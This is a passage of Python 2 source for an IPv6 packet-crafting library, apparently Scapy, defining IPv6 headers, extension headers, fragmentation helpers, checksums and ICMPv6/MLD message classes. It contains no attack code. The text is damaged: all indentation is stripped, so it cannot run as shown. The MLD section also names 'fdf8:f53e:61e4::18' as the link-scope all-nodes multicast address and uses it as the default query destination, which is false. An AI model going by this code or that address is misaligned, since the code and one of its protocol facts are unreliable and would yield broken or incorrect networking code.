6: "TCP",
17: "UDP",
43: "IPv6ExtHdrRouting",
44: "IPv6ExtHdrFragment",
#50: "IPv6ExtHrESP",
#51: "IPv6ExtHdrAH",
58: "ICMPv6Unknown",
59: "Raw",
60: "IPv6ExtHdrDestOpt" }
class IP6ListField(StrField):
islist = 1
def __init__(self, name, default, count_from=None, length_from=None):
if default is None:
default = []
StrField.__init__(self, name, default)
self.count_from = count_from
self.length_from = length_from
def i2len(self, pkt, i):
return 16*len(i)
def i2count(self, pkt, i):
if type(i) is list:
return len(i)
return 0
def getfield(self, pkt, s):
c = l = None
if self.length_from is not None:
l = self.length_from(pkt)
elif self.count_from is not None:
c = self.count_from(pkt)
lst = []
ret = ""
remain = s
if l is not None:
remain,ret = s[:l],s[l:]
while remain:
if c is not None:
if c <= 0:
break
c -= 1
addr = inet_ntop(socket.AF_INET6, remain[:16])
lst.append(addr)
remain = remain[16:]
return remain+ret,lst
def i2m(self, pkt, x):
s = ''
for y in x:
try:
y = inet_pton(socket.AF_INET6, y)
except:
y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0]
y = inet_pton(socket.AF_INET6, y)
s += y
return s
def i2repr(self,pkt,x):
s = []
if x == None:
return "[]"
for y in x:
s.append('%s' % y)
return "[ %s ]" % (", ".join(s))
class _IPv6GuessPayload:
name = "Dummy class that implements guess_payload_class() for IPv6"
def default_payload_class(self,p):
if self.nh == 58: # ICMPv6
t = ord(p[0])
if len(p) > 2 and t == 139 or t == 140: # Node Info Query
return _niquery_guesser(p)
if len(p) >= icmp6typesminhdrlen.get(t, sys.maxint): # Other ICMPv6 messages
return get_cls(icmp6typescls.get(t,"Raw"), "Raw")
return Raw
elif self.nh == 135 and len(p) > 3: # Mobile IPv6
return _mip6_mhtype2cls.get(ord(p[2]), MIP6MH_Generic)
else:
return get_cls(ipv6nhcls.get(self.nh,"Raw"), "Raw")
class IPv6(_IPv6GuessPayload, Packet, IPTools):
name = "IPv6"
fields_desc = [ BitField("version" , 6 , 4),
BitField("tc", 0, 8), #TODO: IPv6, ByteField ?
BitField("fl", 0, 20),
ShortField("plen", None),
ByteEnumField("nh", 59, ipv6nh),
ByteField("hlim", 64),
SourceIP6Field("src", "dst"), # dst is for src @ selection
IP6Field("dst", "::1") ]
def route(self):
dst = self.dst
if isinstance(dst,Gen):
dst = iter(dst).next()
return conf.route6.route(dst)
def mysummary(self):
return "%s > %s (%i)" % (self.src,self.dst, self.nh)
def post_build(self, p, pay):
p += pay
if self.plen is None:
l = len(p) - 40
p = p[:4]+struct.pack("!H", l)+p[6:]
return p
def extract_padding(self, s):
l = self.plen
return s[:l], s[l:]
def hashret(self):
if self.nh == 58 and isinstance(self.payload, _ICMPv6):
if self.payload.type < 128:
return self.payload.payload.hashret()
elif (self.payload.type in [133,134,135,136,144,145]):
return struct.pack("B", self.nh)+self.payload.hashret()
nh = self.nh
sd = self.dst
ss = self.src
if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
# With routing header, the destination is the last
# address of the IPv6 list if segleft > 0
nh = self.payload.nh
try:
sd = self.addresses[-1]
except IndexError:
sd = '::1'
# TODO: big bug with ICMPv6 error messages as the destination of IPerror6
# could be anything from the original list ...
if 1:
sd = inet_pton(socket.AF_INET6, sd)
for a in self.addresses:
a = inet_pton(socket.AF_INET6, a)
sd = strxor(sd, a)
sd = inet_ntop(socket.AF_INET6, sd)
if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
nh = self.payload.nh
if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
nh = self.payload.nh
if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
foundhao = None
for o in self.payload.options:
if isinstance(o, HAO):
foundhao = o
if foundhao:
nh = self.payload.nh # XXX what if another extension follows ?
ss = foundhao.hoa
if conf.checkIPsrc and conf.checkIPaddr:
sd = inet_pton(socket.AF_INET6, sd)
ss = inet_pton(socket.AF_INET6, self.src)
return struct.pack("B",nh)+self.payload.hashret()
else:
return struct.pack("B", nh)+self.payload.hashret()
def answers(self, other):
if not isinstance(other, IPv6): # self is reply, other is request
return False
if conf.checkIPaddr:
ss = inet_pton(socket.AF_INET6, self.src)
sd = inet_pton(socket.AF_INET6, self.dst)
os = inet_pton(socket.AF_INET6, other.src)
od = inet_pton(socket.AF_INET6, other.dst)
# request was sent to a multicast address (other.dst)
# Check reply destination addr matches request source addr (i.e
# sd == os) except when reply is multicasted too
# XXX test mcast scope matching ?
if in6_ismaddr(other.dst):
if in6_ismaddr(self.dst):
if ((od == sd) or
(in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))):
return self.payload.answers(other.payload)
return False
if (os == sd):
return self.payload.answers(other.payload)
return False
elif (sd != os): # or ss != od): <- removed for ICMP errors
return False
if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128:
# ICMPv6 Error message -> generated by IPv6 packet
# Note : at the moment, we jump the ICMPv6 specific class
# to call answers() method of erroneous packet (over
# initial packet). There can be cases where an ICMPv6 error
# class could implement a specific answers method that perform
# a specific task. Currently, don't see any use ...
return self.payload.payload.answers(other)
elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
return self.payload.answers(other.payload.payload)
elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
return self.payload.answers(other.payload.payload)
elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting
elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
return self.payload.payload.answers(other.payload.payload)
elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance
return self.payload.payload.answers(other.payload)
else:
if (self.nh != other.nh):
return False
return self.payload.answers(other.payload)
conf.neighbor.register_l3(Ether, IPv6, lambda l2,l3: getmacbyip6(l3.dst))
class IPerror6(IPv6):
name = "IPv6 in ICMPv6"
def answers(self, other):
if not isinstance(other, IPv6):
return False
sd = inet_pton(socket.AF_INET6, self.dst)
ss = inet_pton(socket.AF_INET6, self.src)
od = inet_pton(socket.AF_INET6, other.dst)
os = inet_pton(socket.AF_INET6, other.src)
# Make sure that the ICMPv6 error is related to the packet scapy sent
if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128:
# find upper layer for self (possible citation)
selfup = self.payload
while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
selfup = selfup.payload
# find upper layer for other (initial packet). Also look for RH
otherup = other.payload
request_has_rh = False
while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
if isinstance(otherup, IPv6ExtHdrRouting):
request_has_rh = True
otherup = otherup.payload
if ((ss == os and sd == od) or # <- Basic case
(ss == os and request_has_rh)): # <- Request has a RH :
# don't check dst address
# Let's deal with possible MSS Clamping
if (isinstance(selfup, TCP) and
isinstance(otherup, TCP) and
selfup.options != otherup.options): # seems clamped
# Save fields modified by MSS clamping
old_otherup_opts = otherup.options
old_otherup_cksum = otherup.chksum
old_otherup_dataofs = otherup.dataofs
old_selfup_opts = selfup.options
old_selfup_cksum = selfup.chksum
old_selfup_dataofs = selfup.dataofs
# Nullify them
otherup.options = []
otherup.chksum = 0
otherup.dataofs = 0
selfup.options = []
selfup.chksum = 0
selfup.dataofs = 0
# Test it and save result
s1 = str(selfup)
s2 = str(otherup)
l = min(len(s1), len(s2))
res = s1[:l] == s2[:l]
# recall saved values
otherup.options = old_otherup_opts
otherup.chksum = old_otherup_cksum
otherup.dataofs = old_otherup_dataofs
selfup.options = old_selfup_opts
selfup.chksum = old_selfup_cksum
selfup.dataofs = old_selfup_dataofs
return res
s1 = str(selfup)
s2 = str(otherup)
l = min(len(s1), len(s2))
return s1[:l] == s2[:l]
return False
def mysummary(self):
return Packet.mysummary(self)
#############################################################################
#############################################################################
### Upper Layer Checksum computation ###
#############################################################################
#############################################################################
class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation
name = "Pseudo IPv6 Header"
fields_desc = [ IP6Field("src", "::"),
IP6Field("dst", "::"),
ShortField("uplen", None),
BitField("zero", 0, 24),
ByteField("nh", 0) ]
def in6_chksum(nh, u, p):
"""
Performs IPv6 Upper Layer checksum computation. Provided parameters are:
- 'nh' : value of upper layer protocol
- 'u' : upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
provided with all under layers (IPv6 and all extension headers,
for example)
- 'p' : the payload of the upper layer provided as a string
Functions operate by filling a pseudo header class instance (PseudoIPv6)
with
- Next Header value
- the address of _final_ destination (if some Routing Header with non
segleft field is present in underlayer classes, last address is used.)
- the address of _real_ source (basically the source address of an
IPv6 class instance available in the underlayer or the source address
in HAO option if some Destination Option header found in underlayer
includes this option).
- the length is the length of provided payload string ('p')
"""
ph6 = PseudoIPv6()
ph6.nh = nh
rthdr = 0
hahdr = 0
final_dest_addr_found = 0
while u != None and not isinstance(u, IPv6):
if (isinstance(u, IPv6ExtHdrRouting) and
u.segleft != 0 and len(u.addresses) != 0 and
final_dest_addr_found == 0):
rthdr = u.addresses[-1]
final_dest_addr_found = 1
elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and
isinstance(u.options[0], HAO)):
hahdr = u.options[0].hoa
u = u.underlayer
if u is None:
warning("No IPv6 underlayer to compute checksum. Leaving null.")
return 0
if hahdr:
ph6.src = hahdr
else:
ph6.src = u.src
if rthdr:
ph6.dst = rthdr
else:
ph6.dst = u.dst
ph6.uplen = len(p)
ph6s = str(ph6)
return checksum(ph6s+p)
#############################################################################
#############################################################################
### Extension Headers ###
#############################################################################
#############################################################################
# Inherited by all extension header classes
class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
name = 'Abstract IPV6 Option Header'
aliastypes = [IPv6, IPerror6] # TODO ...
#################### IPv6 options for Extension Headers #####################
_hbhopts = { 0x00: "Pad1",
0x01: "PadN",
0x04: "Tunnel Encapsulation Limit",
0x05: "Router Alert",
0x06: "Quick-Start",
0xc2: "Jumbo Payload",
0xc9: "Home Address Option" }
class _OTypeField(ByteEnumField):
"""
Modified BytEnumField that displays information regarding the IPv6 option
based on its option type value (What should be done by nodes that process
the option if they do not understand it ...)
It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options
"""
pol = {0x00: "00: skip",
0x40: "01: discard",
0x80: "10: discard+ICMP",
0xC0: "11: discard+ICMP not mcast"}
enroutechange = {0x00: "0: Don't change en-route",
0x20: "1: May change en-route" }
def i2repr(self, pkt, x):
s = self.i2s.get(x, repr(x))
polstr = self.pol[(x & 0xC0)]
enroutechangestr = self.enroutechange[(x & 0x20)]
return "%s [%s, %s]" % (s, polstr, enroutechangestr)
class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option
name = "Scapy6 Unknown Option"
fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
FieldLenField("optlen", None, length_of="optdata", fmt="B"),
StrLenField("optdata", "",
length_from = lambda pkt: pkt.optlen) ]
def alignment_delta(self, curpos): # By default, no alignment requirement
"""
As specified in section 4.2 of RFC 2460, every option has
an alignment requirement, usually expressed as xn+y, meaning
the Option Type must appear at an integer multiple of x octets
from the start of the header, plus y octets.
This function is given the current position from the
start of the header and returns the required padding length.
"""
return 0
class Pad1(Packet): # IPv6 Hop-By-Hop Option
name = "Pad1"
fields_desc = [ _OTypeField("otype", 0x00, _hbhopts) ]
def alignment_delta(self, curpos): # No alignment requirement
return 0
class PadN(Packet): # IPv6 Hop-By-Hop Option
name = "PadN"
fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
FieldLenField("optlen", None, length_of="optdata", fmt="B"),
StrLenField("optdata", "",
length_from = lambda pkt: pkt.optlen)]
def alignment_delta(self, curpos): # No alignment requirement
return 0
class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option
name = "Router Alert"
fields_desc = [_OTypeField("otype", 0x05, _hbhopts),
ByteField("optlen", 2),
ShortEnumField("value", None,
{ 0: "Datagram contains a MLD message",
1: "Datagram contains RSVP message",
2: "Datagram contains an Active Network message" }) ]
# TODO : Check IANA has not defined new values for value field of RouterAlertOption
# TODO : now that we have that option, we should do something in MLD class that need it
def alignment_delta(self, curpos): # alignment requirement : 2n+0
x = 2 ; y = 0
delta = x*((curpos - y + x - 1)/x) + y - curpos
return delta
class Jumbo(Packet): # IPv6 Hop-By-Hop Option
name = "Jumbo Payload"
fields_desc = [_OTypeField("otype", 0xC2, _hbhopts),
ByteField("optlen", 4),
IntField("jumboplen", None) ]
def alignment_delta(self, curpos): # alignment requirement : 4n+2
x = 4 ; y = 2
delta = x*((curpos - y + x - 1)/x) + y - curpos
return delta
class HAO(Packet): # IPv6 Destination Options Header Option
name = "Home Address Option"
fields_desc = [_OTypeField("otype", 0xC9, _hbhopts),
ByteField("optlen", 16),
IP6Field("hoa", "::") ]
def alignment_delta(self, curpos): # alignment requirement : 8n+6
x = 8 ; y = 6
delta = x*((curpos - y + x - 1)/x) + y - curpos
return delta
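# Worked example of the xn+y alignment rule (illustration only): for HAO,
# x=8 and y=6, so with curpos=2 the formula above gives
#   delta = 8*((2 - 6 + 8 - 1)/8) + 6 - 2 = 8*0 + 4 = 4
# i.e. 4 octets of padding are required so the option type starts at
# offset 6 (= 8*0 + 6) from the beginning of the header.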
_hbhoptcls = { 0x00: Pad1,
0x01: PadN,
0x05: RouterAlert,
0xC2: Jumbo,
0xC9: HAO }
######################## Hop-by-Hop Extension Header ########################
class _HopByHopOptionsField(PacketListField):
islist = 1
holds_packet = 1
def __init__(self, name, default, cls, curpos, count_from=None, length_from=None):
self.curpos = curpos
PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from)
def i2len(self, pkt, i):
l = len(self.i2m(pkt, i))
return l
def i2count(self, pkt, i):
if type(i) is list:
return len(i)
return 0
def getfield(self, pkt, s):
c = l = None
if self.length_from is not None:
l = self.length_from(pkt)
elif self.count_from is not None:
c = self.count_from(pkt)
opt = []
ret = ""
x = s
if l is not None:
x,ret = s[:l],s[l:]
while x:
if c is not None:
if c <= 0:
break
c -= 1
o = ord(x[0]) # Option type
cls = self.cls
if _hbhoptcls.has_key(o):
cls = _hbhoptcls[o]
try:
op = cls(x)
except:
op = self.cls(x)
opt.append(op)
if isinstance(op.payload, conf.raw_layer):
x = op.payload.load
del(op.payload)
else:
x = ""
return x+ret,opt
def i2m(self, pkt, x):
autopad = None
try:
autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
except:
autopad = 1
if not autopad:
return "".join(map(str, x))
curpos = self.curpos
s = ""
for p in x:
d = p.alignment_delta(curpos)
curpos += d
if d == 1:
s += str(Pad1())
elif d != 0:
s += str(PadN(optdata='\x00'*(d-2)))
pstr = str(p)
curpos += len(pstr)
s += pstr
# Let's make the class including our option field
# a multiple of 8 octets long
d = curpos % 8
if d == 0:
return s
d = 8 - d
if d == 1:
s += str(Pad1())
elif d != 0:
s += str(PadN(optdata='\x00'*(d-2)))
return s
def addfield(self, pkt, s, val):
return s+self.i2m(pkt, val)
class _PhantomAutoPadField(ByteField):
def addfield(self, pkt, s, val):
return s
def getfield(self, pkt, s):
return s, 1
def i2repr(self, pkt, x):
if x:
return "On"
return "Off"
class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
name = "IPv6 Extension Header - Hop-by-Hop Options Header"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, length_of="options", fmt="B",
adjust = lambda pkt,x: (x+2+7)/8 - 1),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_HopByHopOptionsField("options", [], HBHOptUnknown, 2,
length_from = lambda pkt: (8*(pkt.len+1))-2) ]
overload_fields = {IPv6: { "nh": 0 }}
######################## Destination Option Header ##########################
class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
name = "IPv6 Extension Header - Destination Options Header"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, length_of="options", fmt="B",
adjust = lambda pkt,x: (x+2+7)/8 - 1),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_HopByHopOptionsField("options", [], HBHOptUnknown, 2,
length_from = lambda pkt: (8*(pkt.len+1))-2) ]
overload_fields = {IPv6: { "nh": 60 }}
############################# Routing Header ################################
class IPv6ExtHdrRouting(_IPv6ExtHdr):
name = "IPv6 Option Header Routing"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, count_of="addresses", fmt="B",
adjust = lambda pkt,x:2*x), # in 8 bytes blocks
ByteField("type", 0),
ByteField("segleft", None),
BitField("reserved", 0, 32), # There is meaning in this field ...
IP6ListField("addresses", [],
length_from = lambda pkt: 8*pkt.len)]
overload_fields = {IPv6: { "nh": 43 }}
def post_build(self, pkt, pay):
if self.segleft is None:
pkt = pkt[:3]+struct.pack("B", len(self.addresses))+pkt[4:]
return _IPv6ExtHdr.post_build(self, pkt, pay)
########################### Fragmentation Header ############################
class IPv6ExtHdrFragment(_IPv6ExtHdr):
name = "IPv6 Extension Header - Fragmentation header"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
BitField("res1", 0, 8),
BitField("offset", 0, 13),
BitField("res2", 0, 2),
BitField("m", 0, 1),
IntField("id", None) ]
overload_fields = {IPv6: { "nh": 44 }}
def defragment6(pktlist):
"""
Performs defragmentation of a list of IPv6 packets. Packets are reordered.
Crap is dropped. What lacks is completed by 'X' characters.
"""
l = filter(lambda x: IPv6ExtHdrFragment in x, pktlist) # remove non fragments
if not l:
return []
id = l[0][IPv6ExtHdrFragment].id
llen = len(l)
l = filter(lambda x: x[IPv6ExtHdrFragment].id == id, l)
if len(l) != llen:
warning("defragment6: some fragmented packets have been removed from list")
llen = len(l)
# reorder fragments
i = 0
res = []
while l:
min_pos = 0
min_offset = l[0][IPv6ExtHdrFragment].offset
for p in l:
cur_offset = p[IPv6ExtHdrFragment].offset
if cur_offset < min_offset:
min_pos = l.index(p)   # remember the position of the lowest offset seen so far
min_offset = cur_offset
res.append(l[min_pos])
del(l[min_pos])
# regenerate the fragmentable part
fragmentable = ""
for p in res:
q=p[IPv6ExtHdrFragment]
offset = 8*q.offset
if offset != len(fragmentable):
warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset))
fragmentable += "X"*(offset - len(fragmentable))
fragmentable += str(q.payload)
# Regenerate the unfragmentable part.
q = res[0]
nh = q[IPv6ExtHdrFragment].nh
q[IPv6ExtHdrFragment].underlayer.nh = nh
q[IPv6ExtHdrFragment].underlayer.payload = None
q /= conf.raw_layer(load=fragmentable)
return IPv6(str(q))
def fragment6(pkt, fragSize):
"""
Performs fragmentation of an IPv6 packet. Provided packet ('pkt') must already
contain an IPv6ExtHdrFragment() class. 'fragSize' argument is the expected
maximum size of fragments (MTU). The list of packets is returned.
If packet does not contain an IPv6ExtHdrFragment class, it is returned in
result list.
"""
pkt = pkt.copy()
if not IPv6ExtHdrFragment in pkt:
# TODO : automatically add a fragment before upper Layer
# at the moment, we do nothing and return initial packet
# as single element of a list
return [pkt]
# If the payload is bigger than 65535, a Jumbo payload must be used, as
# an IPv6 packet can't be bigger than 65535 bytes.
if len(str(pkt[IPv6ExtHdrFragment])) > 65535:
warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.")
return []
s = str(pkt) # for instantiation to get upper layer checksum right
if len(s) <= fragSize:
return [pkt]
# Fragmentable part : fake IPv6 for Fragmentable part length computation
fragPart = pkt[IPv6ExtHdrFragment].payload
tmp = str(IPv6(src="::1", dst="::1")/fragPart)
fragPartLen = len(tmp) - 40 # basic IPv6 header length
fragPartStr = s[-fragPartLen:]
# Grab Next Header for use in Fragment Header
nh = IPv6(tmp[:40]).nh
# Keep fragment header
fragHeader = pkt[IPv6ExtHdrFragment]
fragHeader.payload = None # detach payload
# Unfragmentable Part
unfragPartLen = len(s) - fragPartLen - 8
unfragPart = pkt
pkt[IPv6ExtHdrFragment].underlayer.payload = None # detach payload
# Cut the fragmentable part to fit fragSize. Inner fragments have
# a length that is an integer multiple of 8 octets. last Frag MTU
# can be anything below MTU
lastFragSize = fragSize - unfragPartLen - 8
innerFragSize = lastFragSize - (lastFragSize % 8)
if lastFragSize <= 0 or innerFragSize == 0:
warning("Provided fragment size value is too low. " +
"Should be more than %d" % (unfragPartLen + 8))
return [unfragPart/fragHeader/fragPart]
remain = fragPartStr
res = []
fragOffset = 0 # offset, incremented during creation
fragId = random.randint(0,0xffffffff) # random id ...
if fragHeader.id is not None: # ... except id provided by user
fragId = fragHeader.id
fragHeader.m = 1
fragHeader.id = fragId
fragHeader.nh = nh
# Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ...
while True:
if (len(remain) > lastFragSize):
tmp = remain[:innerFragSize]
remain = remain[innerFragSize:]
fragHeader.offset = fragOffset # update offset
fragOffset += (innerFragSize / 8) # compute new one
if IPv6 in unfragPart:
unfragPart[IPv6].plen = None
tempo = unfragPart/fragHeader/conf.raw_layer(load=tmp)
res.append(tempo)
else:
fragHeader.offset = fragOffset # update offSet
fragHeader.m = 0
if IPv6 in unfragPart:
unfragPart[IPv6].plen = None
tempo = unfragPart/fragHeader/conf.raw_layer(load=remain)
res.append(tempo)
break
return res
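# Usage sketch (illustration): fragment a large echo request and reassemble it.
# The packet must already carry an IPv6ExtHdrFragment, as the docstring requires:
#   big   = IPv6(dst="::1")/IPv6ExtHdrFragment()/ICMPv6EchoRequest(data="A"*3000)
#   frags = fragment6(big, 1280)      # list of fragments fitting a 1280-byte MTU
#   whole = defragment6(frags)        # reordered and reassembled IPv6 packet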
############################### AH Header ###################################
# class _AHFieldLenField(FieldLenField):
# def getfield(self, pkt, s):
# l = getattr(pkt, self.fld)
# l = (l*8)-self.shift
# i = self.m2i(pkt, s[:l])
# return s[l:],i
# class _AHICVStrLenField(StrLenField):
# def i2len(self, pkt, x):
# class IPv6ExtHdrAH(_IPv6ExtHdr):
# name = "IPv6 Extension Header - AH"
# fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
# _AHFieldLenField("len", None, "icv"),
# ShortField("res", 0),
# IntField("spi", 0),
# IntField("sn", 0),
# _AHICVStrLenField("icv", None, "len", shift=2) ]
# overload_fields = {IPv6: { "nh": 51 }}
# def post_build(self, pkt, pay):
# if self.len is None:
# pkt = pkt[0]+struct.pack("!B", 2*len(self.addresses))+pkt[2:]
# if self.segleft is None:
# pkt = pkt[:3]+struct.pack("!B", len(self.addresses))+pkt[4:]
# return _IPv6ExtHdr.post_build(self, pkt, pay)
############################### ESP Header ##################################
# class IPv6ExtHdrESP(_IPv6extHdr):
# name = "IPv6 Extension Header - ESP"
# fields_desc = [ IntField("spi", 0),
# IntField("sn", 0),
# # there is things to extract from IKE work
# ]
# overloads_fields = {IPv6: { "nh": 50 }}
#############################################################################
#############################################################################
### ICMPv6* Classes ###
#############################################################################
#############################################################################
icmp6typescls = { 1: "ICMPv6DestUnreach",
2: "ICMPv6PacketTooBig",
3: "ICMPv6TimeExceeded",
4: "ICMPv6ParamProblem",
128: "ICMPv6EchoRequest",
129: "ICMPv6EchoReply",
130: "ICMPv6MLQuery",
131: "ICMPv6MLReport",
132: "ICMPv6MLDone",
133: "ICMPv6ND_RS",
134: "ICMPv6ND_RA",
135: "ICMPv6ND_NS",
136: "ICMPv6ND_NA",
137: "ICMPv6ND_Redirect",
#138: Do Me - RFC 2894 - Seems painful
139: "ICMPv6NIQuery",
140: "ICMPv6NIReply",
141: "ICMPv6ND_INDSol",
142: "ICMPv6ND_INDAdv",
#143: Do Me - RFC 3810
144: "ICMPv6HAADRequest",
145: "ICMPv6HAADReply",
146: "ICMPv6MPSol",
147: "ICMPv6MPAdv",
#148: Do Me - SEND related - RFC 3971
#149: Do Me - SEND related - RFC 3971
151: "ICMPv6MRD_Advertisement",
152: "ICMPv6MRD_Solicitation",
153: "ICMPv6MRD_Termination",
}
icmp6typesminhdrlen = { 1: 8,
2: 8,
3: 8,
4: 8,
128: 8,
129: 8,
130: 24,
131: 24,
132: 24,
133: 8,
134: 16,
135: 24,
136: 24,
137: 40,
#139:
#140
141: 8,
142: 8,
144: 8,
145: 8,
146: 8,
147: 8,
151: 8,
152: 4,
153: 4
}
icmp6types = { 1 : "Destination unreachable",
2 : "Packet too big",
3 : "Time exceeded",
4 : "Parameter problem",
100 : "Private Experimentation",
101 : "Private Experimentation",
128 : "Echo Request",
129 : "Echo Reply",
130 : "MLD Query",
131 : "MLD Report",
132 : "MLD Done",
133 : "Router Solicitation",
134 : "Router Advertisement",
135 : "Neighbor Solicitation",
136 : "Neighbor Advertisement",
137 : "Redirect Message",
138 : "Router Renumbering",
139 : "ICMP Node Information Query",
140 : "ICMP Node Information Response",
141 : "Inverse Neighbor Discovery Solicitation Message",
142 : "Inverse Neighbor Discovery Advertisement Message",
143 : "Version 2 Multicast Listener Report",
144 : "Home Agent Address Discovery Request Message",
145 : "Home Agent Address Discovery Reply Message",
146 : "Mobile Prefix Solicitation",
147 : "Mobile Prefix Advertisement",
148 : "Certification Path Solicitation",
149 : "Certification Path Advertisement",
151 : "Multicast Router Advertisement",
152 : "Multicast Router Solicitation",
153 : "Multicast Router Termination",
200 : "Private Experimentation",
201 : "Private Experimentation" }
class _ICMPv6(Packet):
name = "ICMPv6 dummy class"
overload_fields = {IPv6: {"nh": 58}}
def post_build(self, p, pay):
p += pay
if self.cksum == None:
chksum = in6_chksum(58, self.underlayer, p)
p = p[:2]+struct.pack("!H", chksum)+p[4:]
return p
def hashret(self):
return self.payload.hashret()
def answers(self, other):
# isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
if (isinstance(self.underlayer, IPerror6) or
isinstance(self.underlayer, _IPv6ExtHdr) and
isinstance(other, _ICMPv6)):
if not ((self.type == other.type) and
(self.code == other.code)):
return 0
return 1
return 0
class _ICMPv6Error(_ICMPv6):
name = "ICMPv6 errors dummy class"
def guess_payload_class(self,p):
return IPerror6
class ICMPv6Unknown(_ICMPv6):
name = "Scapy6 ICMPv6 fallback class"
fields_desc = [ ByteEnumField("type",1, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
StrField("msgbody", "")]
################################## RFC 2460 #################################
class ICMPv6DestUnreach(_ICMPv6Error):
name = "ICMPv6 Destination Unreachable"
fields_desc = [ ByteEnumField("type",1, icmp6types),
ByteEnumField("code",0, { 0: "No route to destination",
1: "Communication with destination administratively prohibited",
2: "Beyond scope of source address",
3: "Address unreachable",
4: "Port unreachable" }),
XShortField("cksum", None),
XIntField("unused",0x00000000)]
class ICMPv6PacketTooBig(_ICMPv6Error):
name = "ICMPv6 Packet Too Big"
fields_desc = [ ByteEnumField("type",2, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
IntField("mtu",1280)]
class ICMPv6TimeExceeded(_ICMPv6Error):
name = "ICMPv6 Time Exceeded"
fields_desc = [ ByteEnumField("type",3, icmp6types),
ByteEnumField("code",0, { 0: "hop limit exceeded in transit",
1: "fragment reassembly time exceeded"}),
XShortField("cksum", None),
XIntField("unused",0x00000000)]
# The default pointer value is set to the next header field of
# the encapsulated IPv6 packet
class ICMPv6ParamProblem(_ICMPv6Error):
name = "ICMPv6 Parameter Problem"
fields_desc = [ ByteEnumField("type",4, icmp6types),
ByteEnumField("code",0, {0: "erroneous header field encountered",
1: "unrecognized Next Header type encountered",
2: "unrecognized IPv6 option encountered"}),
XShortField("cksum", None),
IntField("ptr",6)]
class ICMPv6EchoRequest(_ICMPv6):
name = "ICMPv6 Echo Request"
fields_desc = [ ByteEnumField("type", 128, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id",0),
XShortField("seq",0),
StrField("data", "")]
def mysummary(self):
return self.sprintf("%name% (id: %id% seq: %seq%)")
def hashret(self):
return struct.pack("HH",self.id,self.seq)+self.payload.hashret()
class ICMPv6EchoReply(ICMPv6EchoRequest):
name = "ICMPv6 Echo Reply"
type = 129
def answers(self, other):
# We could match data content between request and reply.
return (isinstance(other, ICMPv6EchoRequest) and
self.id == other.id and self.seq == other.seq and
self.data == other.data)
############ ICMPv6 Multicast Listener Discovery (RFC3810) ##################
# All MLD messages are sent with a link-local source address
# -> take care of this in post_build if none is specified
# The Hop-Limit value must be 1
# "and an IPv6 Router Alert option in a Hop-by-Hop Options
# header. (The router alert option is necessary to cause routers to
# examine MLD messages sent to multicast addresses in which the router
# itself has no interest"
class _ICMPv6ML(_ICMPv6):
fields_desc = [ ByteEnumField("type", 130, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
ShortField("mrd", 0),
ShortField("reserved", 0),
IP6Field("mladdr","::")]
# general queries are sent to the link-scope all-nodes multicast
# address fdf8:f53e:61e4::18, with a multicast address field of 0 and a MRD of
# [Query Response Interval]
# Default value for mladdr is set to 0 for a General Query, and
# overloaded by the user for a Multicast Address specific query
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Query"
type = 130
    mrd    = 10000 # 10s
    mladdr = "::"
overload_fields = {IPv6: { "dst": "fdf8:f53e:61e4::18", "hlim": 1, "nh": 58 }}
def hashret(self):
if self.mladdr != "::":
            return inet_pton(socket.AF_INET6, self.mladdr) + self.payload.hashret()
else:
return self.payload.hashret()
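# Usage sketch (not from the original source; addresses are illustrative):
# a General Query keeps the default mladdr of "::"; an address-specific
# query overrides it:
#   IPv6(src="fe80::1")/ICMPv6MLQuery()                    # General Query
#   IPv6(src="fe80::1")/ICMPv6MLQuery(mladdr="ff02::1:3")  # address-specific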
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLReport(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Report"
type = 131
